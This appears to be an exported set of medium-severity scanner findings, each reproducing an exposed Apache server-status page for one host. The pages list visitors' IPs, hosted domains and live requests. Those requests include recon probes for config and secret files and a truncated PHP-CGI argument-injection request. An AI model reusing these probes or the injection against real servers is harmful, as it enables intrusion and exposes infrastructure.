4-40712541680/293/46416_ 30.1810248503060.05.611470.67 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 4-40712541680/324/45678_ 30.181026410262
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802a73ebbf0
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 25-Nov-2025 22:35:06 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 394 Parent Server MPM Generation: 393 Server uptime: 74 days 10 hours 14 minutes 3 seconds Server load: 0.12 0.12 0.09 Total accesses: 2345559 - Total Traffic: 72.1 GB - Total Duration: 1466291845 CPU Usage: u185.81 s233.57 cu12923.8 cs7408.04 - .323% CPU load .365 requests/sec - 11.7 kB/second - 32.2 kB/request - 625.135 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0901857no0yes010000 1901856no0yes010000 2901892no1yes010000 3901990no1yes010000 4901858no0yes19000 Sum502 149000 ______________________________________________W___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3939018570/8/43328_ 2.61566942324514050.00.801591.10 172.64.196.142http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/6/42884_ 2.7215630482542650.00.091382.05 172.68.250.130http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/11/43387_ 4.04156820195762830.00.161405.07 212.170.119.244h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/5/42993_ 2.031563427207741950.00.111425.45 172.69.36.170http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/9/43770_ 4.395710201772520.00.191457.99 172.70.108.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/14/43270_ 3.505711202338180.00.531441.08 172.71.146.106h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/8/43520_ 2.44566168282387220.00.421378.29 172.69.127.152http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/5/42810_ 3.5229093212496850.00.291456.83 172.70.43.71h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/10/43432_ 3.5229090207690700.00.141371.56 104.23.213.124h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/8/43259_ 3.5529140316212480.00.091556.01 162.158.63.171h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/9/48493_ 4.26243413215203590.00.231585.74 104.23.172.5h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3939018560/9/49078_ 3.8613070254440660.00.411573.44 188.114.111.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/6/48741_ 2.022380261644290.00.111502.28 172.68.165.130http/1.1done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3939018560/8/48638_ 2.0229760709869110.00.451476.88 172.69.36.170http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/8/49232_ 3.2713020231687400.00.091554.70 172.70.135.2h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/6/49802_ 4.25244230228734350.00.161475.54 104.23.172.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/8/48934_ 2.441302956263329110.00.111460.83 172.70.154.135http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/12/49520_ 2.8423828215549610.01.141485.75 88.13.236.59h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/8/47765_ 2.8729720341111470.00.371336.92 172.70.224.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/12/49180_ 2.6429721466815650.00.491444.31 172.70.176.85h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/162/45911_ 13.2520243726090.02.801380.73 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-3939018920/178/44897_ 13.2530379090950.04.881316.88 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-3939018920/189/45683_ 13.2510293654600.03.231403.47 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3939018920/156/44816_ 13.2500220502270.03.181335.88 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3939018920/172/45079_ 13.2530197322740.02.421521.05 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-3939018920/180/45595_ 13.2500213799710.02.471334.95 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-3939018920/182/45061_ 13.1421028210623460.03.891370.97 172.64.217.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/180/45428_ 13.2331239323000.03.671375.61 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3939018920/171/45361_ 13.2430230980340.03.701544.18 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 2-3939018920/178/45780_ 13.2420252950340.02.321415.30 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 3-3939019900/266/52713_ 18.8810315568950.04.121638.33 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-3939019900/266/51178_ 18.803557280936180.04.921440.12 141.101.100.179h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/250/52501_ 18.8700309819810.05.171625.41 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-3939019900/337/51598_ 18.8820331888010.05.581731.40 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-3939019900/256/51875_ 18.8720257932930.05.451474.98 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-3939019900/252/51814_ 18.8730243572650.05.841615.40 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-3939019900/259/52299_ 18.8810288999090.04.841664.54 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3939019900/260/52274_ 18.8800369300110.04.901653.47 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3939019900/250/51407_ 18.8720907712940.05.001588.83 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 3-3939019900/276/52568_ 18.8800385837860.05.491568.45 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-3939018580/20/44915_ 3.2710040376997240.00.351416.05 172.68.150.76h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/7/45095_ 4.48244151265817460.00.131485.45 172.71.144.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/17/45150_ 4.2010040226482970.00.471534.41 45.227.254.156http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x03 4-3939018580/19/45364_ 4.82249362241897910.00.381431.81 172.70.80.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/20/44578_ 3.882440253296310.00.321364.28 172.70.134.131h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858021e10ea07
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 23-Nov-2025 22:58:16 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 386 Parent Server MPM Generation: 385 Server uptime: 72 days 10 hours 37 minutes 13 seconds Server load: 0.04 0.05 0.05 Total accesses: 2261567 - Total Traffic: 69.8 GB - Total Duration: 1411321814 CPU Usage: u183.02 s238.17 cu12490 cs7173.36 - .321% CPU load .361 requests/sec - 11.7 kB/second - 32.4 kB/request - 624.046 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0659668no0yes010000 1659667no0yes010000 2659669no1yes19000 3659772no0yes010000 4659801no0yes010000 Sum501 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3856596680/48/42143_ 10.5600318304810.01.241571.89 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-3856596680/57/41532_ 10.5610471743690.00.571348.49 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-3856596680/55/41938_ 10.5510185887590.00.581381.51 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-3856596680/45/41671_ 10.5610200935440.00.731386.41 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3856596680/43/42245_ 10.5020189176130.00.741432.80 172.176.160.115http/1.1relehse.com:80GET /wp-includes/random_compat/ HTTP/1.1 0-3856596680/59/42059_ 10.532362196471900.01.051419.25 104.22.1.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3856596680/53/42231_ 10.5520270214540.02.141340.68 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-3856596680/65/41636_ 10.5600199473580.00.611405.91 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3856596680/50/42163_ 10.5520195002150.01.001322.74 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-3856596680/56/41996_ 10.5600305831040.01.111511.30 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3856596670/7/46512_ 7.3146090205836350.00.051514.90 172.64.222.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/3/47138_ 7.1246140244230990.00.011521.11 162.158.91.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/6/46721_ 7.6946140251168860.00.051463.08 172.68.12.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/5/46555_ 5.8446080698236090.00.031430.45 5.187.35.21http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/6/47320_ 7.1242300222064800.00.011511.06 185.102.115.93http/1.1 1-3856596670/8/47828_ 7.7046130218219000.00.061425.46 172.70.255.244h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/3/47029_ 4.0446080254534900.00.001424.15 108.162.245.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/6/47499_ 7.334230631204890420.00.131440.56 185.102.115.93http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/5/45879_ 7.1246090332345180.00.081297.37 172.70.214.37h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3856596670/8/47213_ 7.8442350457934230.00.071381.21 172.70.142.61h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3856596690/147/44371_ 14.8100227881350.02.331353.29 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-3856596690/150/43424_ 14.8210371418640.03.031264.04 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-3856596690/147/44066_ 14.8300286151350.02.771376.69 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3856596690/154/43391_ 14.8300214088920.02.531300.32 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3856596690/124/43509_ 14.8120182271800.01.251484.02 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-3856596690/144/43995_ 14.8300204979810.02.881284.96 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3856596690/148/43553_ 14.761180202275890.02.591333.18 172.64.192.53h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3856596690/147/43798_ 14.8100220370840.02.611331.88 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-3856596690/140/43862W 14.7500222346560.07.071516.04 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3856596690/136/44006_ 14.75228242670520.03.101390.45 172.176.160.115http/1.1relehse.com:443GET /components/ HTTP/1.1 3-3856597720/117/50031_ 13.3661200299102840.02.141554.69 104.23.213.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/130/48545_ 12.2970915266033630.03.671364.49 172.70.135.53h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/113/49779_ 12.326180285365710.01.771562.31 92.190.179.55h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/118/48987_ 14.2575551313858800.01.331650.26 172.70.240.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/129/49084_ 12.3831160237565250.01.741416.43 172.70.214.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/123/48995_ 14.256627223370640.01.371531.85 162.158.122.175h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/120/49491_ 12.9228424271422850.01.561593.01 172.70.255.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/129/49371_ 13.45284725348768030.01.561553.72 194.164.107.4http/1.1cinre-viewer.tandemhse.com:443GET / HTTP/1.1 3-3856597720/123/48662_ 12.617021882330630.02.211488.54 172.71.183.151h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3856597720/122/49744_ 13.2231160368482290.02.471508.31 172.70.35.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3856598010/77/44169_ 10.1742371372642590.01.221378.86 172.70.208.127h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3856598010/65/44237_ 9.5542361261197820.01.241450.49 162.158.186.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3856598010/66/44246_ 10.0746061220733020.01.771505.91 172.68.7.206h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3856598010/76/44608_ 9.5642313237539900.02.021342.56 104.23.251.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3856598010/61/43800_ 10.0742312247787300.01.121326.51 172.70.255.96h2tandem
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858029f0781b4
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 21-Nov-2025 22:24:52 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 377 Parent Server MPM Generation: 376 Server uptime: 70 days 10 hours 3 minutes 50 seconds Server load: 0.27 0.19 0.15 Total accesses: 2216118 - Total Traffic: 68.9 GB - Total Duration: 1381794571 CPU Usage: u190.83 s235.82 cu12213.1 cs6988.45 - .323% CPU load .364 requests/sec - 11.9 kB/second - 32.6 kB/request - 623.52 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0470753no1yes010000 1470752no1yes010000 2470857no0yes19000 3470886no1yes010000 4470754no1yes010000 Sum504 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process </SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3764707530/55/42001_ 10.2320317389070.09.311568.42 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-3764707530/57/41378_ 9.952517471175490.02.821345.71 172.71.241.140h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/56/41782_ 10.221046184629420.02.811379.15 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 0-3764707530/44/41518_ 9.5720200344570.02.151383.77 162.158.22.236h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/50/42083_ 9.5010184188488860.02.451430.34 172.70.35.179h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/57/41895_ 10.2320194866080.02.531416.75 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 0-3764707530/52/42077_ 10.231046269631570.02.791336.58 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 0-3764707530/59/41450_ 10.2310178853880.03.081402.81 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-3764707530/51/42007_ 9.3010193068260.07.051319.91 172.70.91.180h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/44/41826_ 9.89100304953890.02.351508.43 162.158.122.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/14/46293_ 9.281459205078550.00.091510.89 77.237.239.226http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/13/46901_ 9.291466243347030.00.121516.14 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-3764707520/15/46495_ 9.3120250337390.00.121460.18 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 1-3764707520/14/46327_ 9.3110697279980.00.211426.36 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-3764707520/8/47083_ 9.3090220909830.00.031505.66 172.71.1.192h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/14/47578_ 9.31945217253740.00.301422.02 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-3764707520/9/46807_ 8.39140253687550.00.311421.11 104.22.7.8h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/22/47238_ 9.3020203728080.010.621434.83 172.69.17.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/12/45640_ 9.28153331318160.00.841294.52 77.237.239.226http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/8/46983_ 7.37150457135740.00.061376.49 172.71.166.149h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3764708570/239/43224_ 20.9200215887740.013.561330.48 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3764708570/210/42251_ 20.72045364752000.05.971240.99 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-3764708570/243/42919_ 20.71051277768750.06.561355.75 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-3764708570/224/42197_ 20.9200208176260.04.411275.89 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3764708570/237/42426_ 20.9200178177460.021.291464.77 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3764708570/240/42830_ 20.9200199236600.06.661258.05 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-3764708570/221/42381_ 20.9110191321540.024.581307.77 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 2-3764708570/232/42660_ 20.9210213487630.07.801311.06 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-3764708570/236/42735W 20.7100206691690.05.841488.09 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3764708570/237/42869_ 20.9200236344030.016.281368.06 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3764708860/299/47837_ 22.7910289569470.07.121519.75 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 3-3764708860/295/46396_ 22.7900255504180.05.701327.85 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-3764708860/278/47615_ 22.7800276485210.05.311505.92 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-3764708860/289/46754_ 22.7910303979990.015.141592.85 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-3764708860/274/46882_ 22.8000227908450.05.691382.12 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-3764708860/288/46782_ 22.7900213950370.07.081495.41 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-3764708860/318/47262_ 22.7900262120760.029.521555.07 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-3764708860/251/47176_ 22.7900339678520.027.441513.34 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 3-3764708860/244/46511_ 22.7911872237930.04.191454.64 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-3764708860/278/47564_ 22.77244358980360.07.551469.16 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 4-3764707540/56/43332_ 9.65846367185260.00.371360.70 77.237.239.226http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 4-3764707540/48/43389_ 9.34110246785220.00.141418.14 162.158.122.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3764707540/51/43394_ 8.7780216524490.00.481469.21 172.69.224.168h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3764707540/46/43784_ 9.3470230073120.00.571325.46 162.158.122.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3764707540/54/43064_ 9.41150244168380.01.081291.41 172.68.12.68h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858024d81ab45
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 20-Nov-2025 00:54:41 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 369 Parent Server MPM Generation: 368 Server uptime: 68 days 12 hours 33 minutes 39 seconds Server load: 0.28 0.35 0.23 Total accesses: 2142858 - Total Traffic: 66.8 GB - Total Duration: 1307719803 CPU Usage: u170.31 s219.28 cu11811.8 cs6702.7 - .319% CPU load .362 requests/sec - 11.8 kB/second - 32.7 kB/request - 610.269 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0255408no0yes19000 1255275no0yes010000 2255274no0yes010000 3255276no0yes010000 4255277no0yes010000 Sum500 149000 _W________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3682554080/172/39941_ 15.6320301594710.05.701496.90 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-3682554080/190/39306W 15.6300453818820.04.051281.73 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3682554080/179/39736_ 15.6400169383660.03.371299.73 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3682554080/174/39557_ 15.570537186621860.03.891338.65 172.71.6.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3682554080/198/40061_ 15.6420174340450.05.921360.35 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3682554080/179/39828_ 15.6410182160330.020.051354.44 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3682554080/177/40038_ 15.542709252774150.05.091258.44 172.69.138.94h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3682554080/156/39396_ 15.5420166935220.04.091328.40 172.68.7.160h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3682554080/193/39943_ 15.6410179082120.05.761244.99 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3682554080/185/39806_ 15.562545213439140.026.011435.66 172.68.12.222h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3682552750/117/45350_ 12.3300196944160.04.711458.98 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3682552750/110/45968_ 12.3230228574090.04.371494.85 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-3682552750/111/45517_ 12.2430241582650.014.451429.21 172.69.132.160h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3682552750/95/45422_ 12.2130687761100.018.931400.47 104.23.248.229h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3682552750/108/46129_ 12.3300208446760.05.821478.65 